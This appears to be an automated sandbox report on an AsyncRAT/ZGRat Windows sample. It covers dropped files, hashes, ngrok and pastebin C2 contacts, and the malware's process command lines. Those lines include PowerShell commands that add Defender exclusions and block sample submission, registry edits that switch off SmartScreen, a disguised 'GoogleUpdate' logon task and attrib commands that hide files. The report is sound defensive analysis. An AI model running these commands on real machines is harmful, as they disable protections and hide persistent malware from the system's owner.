Analysis Overview
SHA256
ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade
Threat Level: Known bad
The file ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade was found to be: Known bad.
Malicious Activity Summary
ZGRat
AsyncRat
Detect ZGRat V1
Async RAT payload
Command and Scripting Interpreter: PowerShell
Sets file to hidden
Drops startup file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Unsigned PE
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Creates scheduled task(s)
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 02:49
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 02:49
Reported
2024-05-10 02:51
Platform
win7-20240508-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_259397152 | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe
"C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe"
C:\Windows\temp\explorer.exe
"C:\Windows\temp\explorer.exe" -p123
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1B00.tmp\hide.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe""
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib *.* +s +h
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath 'c:\','d:\','e:\','f:\'.'j:\'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionProcess 'explorer .exe','UPDATE.exe','googleupdate.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DF8.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 3.125.102.39:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 3.125.102.39:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 3.125.102.39:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 3.125.102.39:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 3.125.102.39:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 3.125.102.39:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 3.125.223.134:12586 | 0.tcp.eu.ngrok.io | tcp |
| DE | 3.125.223.134:12586 | 0.tcp.eu.ngrok.io | tcp |
Files
memory/348-0-0x000007FEF5D83000-0x000007FEF5D84000-memory.dmp
memory/348-1-0x00000000002F0000-0x0000000000530000-memory.dmp
memory/348-2-0x000000001B3C0000-0x000000001B610000-memory.dmp
memory/348-3-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp
C:\Windows\Temp\explorer.exe
| MD5 | 645c4a1777edc25cbf67a5a5945e3311 |
| SHA1 | 4985ee60a642ecf0be9b60ab137f30d388c2f9f8 |
| SHA256 | f5557bd3226c5973126b6dd4f2b6cf17b672482b38a77dd995ef1e52958b671c |
| SHA512 | 999d55213a7c8cfbdebcffde20e8143113940fc350342e88c3f53f839a0bb39786327bcfe40cc9ea9c5f4e98b94ba4302e8f925e1263e5e05007686e05004775 |
memory/348-9-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp
\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe
| MD5 | 3a7327b010d7f41fdb759fdbaf8134bf |
| SHA1 | ddb00f2c736bad53e82f1ef69919314aaf888131 |
| SHA256 | 519a0fb3e4753c330054153fc8813bbfbac63c7ce32afe110c5dc558ec6909fa |
| SHA512 | 8abfb42add40eadae4aaf5f04edb989f79e6f2d7b080064d488852654f4c17ec08a16cfcfa3947dbf6bf721f113487ef781492d40b281a9a9810946430fd9f90 |
memory/1712-31-0x0000000003EC0000-0x000000000426E000-memory.dmp
memory/1712-30-0x0000000003EC0000-0x000000000426E000-memory.dmp
memory/1712-29-0x0000000003EC0000-0x000000000426E000-memory.dmp
memory/1712-28-0x0000000003EC0000-0x000000000426E000-memory.dmp
memory/2720-44-0x0000000000AA0000-0x0000000000E4E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
| MD5 | 570c5c4f037ad11d8e3e51d2e9cf5be0 |
| SHA1 | 0f7e2478ef2741f3e6460bf6b5fa6c135a6c0fc8 |
| SHA256 | 0c2b77e6f72dd5736aafaddc75cdee19cde2bd621d0c0c93aae517a29de4e237 |
| SHA512 | 3e5243394ec602098dd11ef77f3ddc0b51d01a8a1ffd829f29b31c237f5e9cf3c011463e619fdc6206bfbee6f0cf43fb681392fd9e1bd35a186e8a059b0beae5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe
| MD5 | 799ce66446d07f987d0e84e50bac4e1f |
| SHA1 | 957f18dd1e9047b36c504752fea23b489dd7c4ae |
| SHA256 | 29eb1c9a192e737c103da9f99ca3e8ed722fe36d5c3073be006867bb0dc58ca2 |
| SHA512 | edd9d33a7fcb765eee0a32a468ac3418f6c23976395b753becafc7bdac160970b89884500d626c5f1476a54f8a3e25bd749c51b956de6ac546efa93a468842de |
memory/2840-62-0x0000000000BF0000-0x0000000000E28000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1B00.tmp\hide.bat
| MD5 | fdc8f1d8d7b410678433976973ea8e76 |
| SHA1 | 1572ec51ef38b39e4702f993a25cf1cbb5914fda |
| SHA256 | 462648eaf83a1385b957078d3ee40e5c1ffcc00f80cee3456c02a38d992f0c7b |
| SHA512 | b8c6dd7ba66a0867c3fbc8bcacd1ac9fb67e9548174258ca1f7363ca95d3c39771c12cb0b4d121f0d1e9fe6208c00f21c47fb9a4d100351706fb5e0e1f4bcf1e |
memory/2720-80-0x0000000000AA0000-0x0000000000E4E000-memory.dmp
memory/2720-81-0x0000000000AA0000-0x0000000000E4E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | dafc68e5d4d1485f1859f56157920d69 |
| SHA1 | 0cd1e5f95fb1d7876fbb6f11255199965e7031dd |
| SHA256 | 7b02fac2670da336f2b51bb553aa0bd920a3e8375e1f94815fefa87cd1ccebb7 |
| SHA512 | ad7e5bc76194225a4110a57218c0ec99059783d47f605eda6a524319e8184cb93a38cfbcdc5eaa35c726c52cd545adc7c83d2c0a0da3e95ae23773c20b69534e |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\tmp5DF8.tmp.bat
| MD5 | f29fb112f347f45afaa2b54945f4b639 |
| SHA1 | 8c9e60bbe423b3d63e7d8156d8b934db7326126a |
| SHA256 | 756a77c890684613ee95f026c4269ef76af2f7edba00953e3026ba49625fd9b4 |
| SHA512 | c4dd15814c736047f6ee4b1d81d6badd321e287e11ef18dcdb2b7b0db4fc74b7547f14ddc4cfef856dbb6ad9dc092588d8096ea261fc6d122e3da4ad3b06188f |
memory/2720-111-0x0000000000AA0000-0x0000000000E4E000-memory.dmp
memory/664-114-0x00000000023F0000-0x000000000279E000-memory.dmp
memory/2860-116-0x0000000000FA0000-0x000000000134E000-memory.dmp
memory/2860-117-0x0000000000FA0000-0x000000000134E000-memory.dmp
memory/2860-118-0x0000000000FA0000-0x000000000134E000-memory.dmp
memory/2860-121-0x0000000000FA0000-0x000000000134E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-10 02:49
Reported
2024-05-10 02:51
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\temp\explorer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240603328 | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SysWOW64\reg.exe | N/A |
